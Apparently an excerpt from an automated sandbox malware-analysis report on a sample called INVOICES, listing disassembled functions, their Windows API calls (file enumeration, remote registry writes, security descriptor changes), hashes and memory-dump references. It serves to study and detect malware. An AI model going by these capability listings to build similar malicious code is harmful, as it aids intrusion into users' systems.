                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0079C892
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0079C8A9
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0079C8D0
                                                                                                                                  • __swprintf.LIBCMT ref: 0079C91C
                                                                                                                                  • __swprintf.LIBCMT ref: 0079C95F
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                  • __swprintf.LIBCMT ref: 0079C9B3
                                                                                                                                    • Part of subcall function 00753818: __woutput_l.LIBCMT ref: 00753871
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CA01
                                                                                                                                    • Part of subcall function 00753818: __flsbuf.LIBCMT ref: 00753893
                                                                                                                                    • Part of subcall function 00753818: __flsbuf.LIBCMT ref: 007538AB
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CA50
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CA9F
                                                                                                                                  • __swprintf.LIBCMT ref: 0079CAEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                  • API String ID: 3953360268-2428617273
                                                                                                                                  • Opcode ID: d6f16c0eafb04a2b5725d06c645097b578b473143c725fd1c8fde1c034ccb24e
                                                                                                                                  • Instruction ID: 4a31d4542c0b61b452fe429278c00f32ff8b76afcca35b8ada500f6dadbb8978
                                                                                                                                  • Opcode Fuzzy Hash: d6f16c0eafb04a2b5725d06c645097b578b473143c725fd1c8fde1c034ccb24e
                                                                                                                                  • Instruction Fuzzy Hash: 2EA120B1408305EBD714EB54C98ADAFB7ECFF94700F404919F585D6192EA78EA08CB62
                                                                                                                                  Function 0079F021 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0079F042
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F057
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F06E
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0079F080
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0079F09A
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0079F0B2
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F0BD
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0079F0D9
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F100
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F117
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0079F129
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(007E8920), ref: 0079F147
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0079F151
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F15E
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F170
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                  • Opcode ID: 1d374f21cf9d7641c8a7d5774898b98052fc8bc47dbd633d05de12187e4abd1b
                                                                                                                                  • Instruction ID: ac75fe20784b74eb1e475e6b4b0a9652bcf072022a50dbb65ea136dd7fdd77d0
                                                                                                                                  • Opcode Fuzzy Hash: 1d374f21cf9d7641c8a7d5774898b98052fc8bc47dbd633d05de12187e4abd1b
                                                                                                                                  • Instruction Fuzzy Hash: 1931D57254121DAADF10EBB4EC59FEE77ACAF08360F144275E804E31A1EB7CDA45CA64
                                                                                                                                  Function 007B08E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B09DE
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,007BF910,00000000,?,00000000,?,?), ref: 007B0A4C
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007B0A94
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007B0B1D
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 007B0E3D
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 007B0E4A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                  • Opcode ID: 3f3acebc84d5806224d191d6c039cab03b241edbb10b16b88a1dfd521769c7e6
                                                                                                                                  • Instruction ID: 143fd8dd4a13845ce5eec4145093faf133ab86d5f27284cc26a08b43bb58072b
                                                                                                                                  • Opcode Fuzzy Hash: 3f3acebc84d5806224d191d6c039cab03b241edbb10b16b88a1dfd521769c7e6
                                                                                                                                  • Instruction Fuzzy Hash: F4024975200611DFDB14EF28C855E6AB7E5FF88714F04895CF98A9B2A2DB78ED01CB81
                                                                                                                                  Function 007BC668 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 007BC691
                                                                                                                                    • Part of subcall function 007BAB69: ClientToScreen.USER32(?,?), ref: 007BAB92
                                                                                                                                    • Part of subcall function 007BAB69: GetWindowRect.USER32(?,?), ref: 007BAC08
                                                                                                                                    • Part of subcall function 007BAB69: PtInRect.USER32(?,?,007BC07E), ref: 007BAC18
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 007BC6FA
                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007BC705
                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007BC728
                                                                                                                                  • _wcscat.LIBCMT ref: 007BC758
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007BC76F
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 007BC788
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 007BC79F
                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 007BC7C1
                                                                                                                                  • DragFinish.SHELL32(?), ref: 007BC7C8
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007BC8BB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                                  • Opcode ID: db08dde8e09c237045c7205952c10f6f6f45c9ec4113198d27010f01fd9fbe7e
                                                                                                                                  • Instruction ID: 89aa589ec132ea99b7f7cfe77fd80e77096f3832539df4fd73b8566da70401c5
                                                                                                                                  • Opcode Fuzzy Hash: db08dde8e09c237045c7205952c10f6f6f45c9ec4113198d27010f01fd9fbe7e
                                                                                                                                  • Instruction Fuzzy Hash: B4615F71108301EFD701EF64DC89E9BBBE9EF88710F004A2EF691961A1DB789949CB52
                                                                                                                                  Function 0079F17E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0079F19F
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F1B4
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F1CB
                                                                                                                                    • Part of subcall function 007943C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007943E1
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0079F1FA
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F205
                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0079F221
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F248
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F25F
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0079F271
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(007E8920), ref: 0079F28F
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0079F299
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F2A6
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F2B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                  • Opcode ID: 86a5e9eda3bc42561940ac1f861a3622ca77362ad17bcacc4f4cbd6a404dd36c
                                                                                                                                  • Instruction ID: 8da4905df0cb20749610c3c181e22f42d65e72db748f743cd47124301f65317f
                                                                                                                                  • Opcode Fuzzy Hash: 86a5e9eda3bc42561940ac1f861a3622ca77362ad17bcacc4f4cbd6a404dd36c
                                                                                                                                  • Instruction Fuzzy Hash: E531D276501659AACF109BB4FC58FEE73ACEF09360F144275E804E31A1DB78DE45CAA8
                                                                                                                                  Function 0079A279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0079A299
                                                                                                                                  • __swprintf.LIBCMT ref: 0079A2BB
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0079A2F8
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0079A31D
                                                                                                                                  • _memset.LIBCMT ref: 0079A33C
                                                                                                                                  • _wcsncpy.LIBCMT ref: 0079A378
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0079A3AD
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0079A3B8
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0079A3C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0079A3CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                  • Opcode ID: 6d6b698f0f10813d07edaf96a7d433488651577f118fa4f47de33f43402547e0
                                                                                                                                  • Instruction ID: bb53fd50bda8c9b96bd76cbfb441f2d0157fbed1419605e72f71a2496bb7f7c5
                                                                                                                                  • Opcode Fuzzy Hash: 6d6b698f0f10813d07edaf96a7d433488651577f118fa4f47de33f43402547e0
                                                                                                                                  • Instruction Fuzzy Hash: 4631B2B550010ABBDB209FA0EC49FEB37BCEF88740F1081B6F908D2160E77896448B65
                                                                                                                                  Function 007BC216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007BC266
                                                                                                                                  • GetFocus.USER32 ref: 007BC276
                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 007BC281
                                                                                                                                  • _memset.LIBCMT ref: 007BC3AC
                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007BC3D7
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 007BC3F7
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 007BC40A
                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007BC43E
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007BC486
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007BC4BE
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007BC4F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                                  • Opcode ID: e4047df1631da9cf97e5e13564febffe8435a6fa23b0314dbaf3ba0f37da480e
                                                                                                                                  • Instruction ID: 4d4481bd0d8bded2a248c3438646f3bbe323d72462fed325e559e8f783ac8ed0
                                                                                                                                  • Opcode Fuzzy Hash: e4047df1631da9cf97e5e13564febffe8435a6fa23b0314dbaf3ba0f37da480e
                                                                                                                                  • Instruction Fuzzy Hash: 63815B71208341AFD711DF14D894BBBBBE8EF88754F00892EF99597291C778E905CBA2
                                                                                                                                  Function 007881D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0078852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00788546
                                                                                                                                    • Part of subcall function 0078852A: GetLastError.KERNEL32(?,0078800A,?,?,?), ref: 00788550
                                                                                                                                    • Part of subcall function 0078852A: GetProcessHeap.KERNEL32(00000008,?,?,0078800A,?,?,?), ref: 0078855F
                                                                                                                                    • Part of subcall function 0078852A: RtlAllocateHeap.NTDLL(00000000,?,0078800A), ref: 00788566
                                                                                                                                    • Part of subcall function 0078852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0078857D
                                                                                                                                    • Part of subcall function 007885C7: GetProcessHeap.KERNEL32(00000008,00788020,00000000,00000000,?,00788020,?), ref: 007885D3
                                                                                                                                    • Part of subcall function 007885C7: RtlAllocateHeap.NTDLL(00000000,?,00788020), ref: 007885DA
                                                                                                                                    • Part of subcall function 007885C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00788020,?), ref: 007885EB
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00788238
                                                                                                                                  • _memset.LIBCMT ref: 0078824D
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0078826C
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0078827D
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 007882BA
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007882D6
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 007882F3
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00788302
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00788309
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0078832A
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00788331
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00788362
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00788388
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0078839C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                  • Opcode ID: 69600ba93e674fa49ea666aa409f2efa1cb94b0239f3661fe4d5434710588537
                                                                                                                                  • Instruction ID: 36098cc3282b6d35fe7e600e01b8ea10ba36274ae8285fc31a0d673caa520f56
                                                                                                                                  • Opcode Fuzzy Hash: 69600ba93e674fa49ea666aa409f2efa1cb94b0239f3661fe4d5434710588537
                                                                                                                                  • Instruction Fuzzy Hash: 58617D7194020AEFCF10EFA5DC44EEEBB79FF04700F448269F915A62A1DB389A05CB61
                                                                                                                                  Function 00746841 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$MZER$NO_AUTO_POSSESS)$NO_START_OPT)$Oat$UCP)$UTF)$UTF16)
                                                                                                                                  • API String ID: 0-2780058304
                                                                                                                                  • Opcode ID: 2bf1a266b1e5aa99f68131217c9daa4b4b0c7bda32efc12617033b9c60c8283d
                                                                                                                                  • Instruction ID: 1a402bab6a1f2321daedb70b967c215b56faa989a127560b0c4edc788e387541
                                                                                                                                  • Opcode Fuzzy Hash: 2bf1a266b1e5aa99f68131217c9daa4b4b0c7bda32efc12617033b9c60c8283d
                                                                                                                                  • Instruction Fuzzy Hash: 9F727075E00219DBDF14DF59C8807AEB7B5FF49310F54816AE849EB290EB389E81CB91
                                                                                                                                  Function 00744140 Relevance: 18.6, APIs: 1, Strings: 9, Instructions: 1132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0D}$0D}$ERCP$MZER$Oat$VUUU$VUUU$VUUU$VUUU
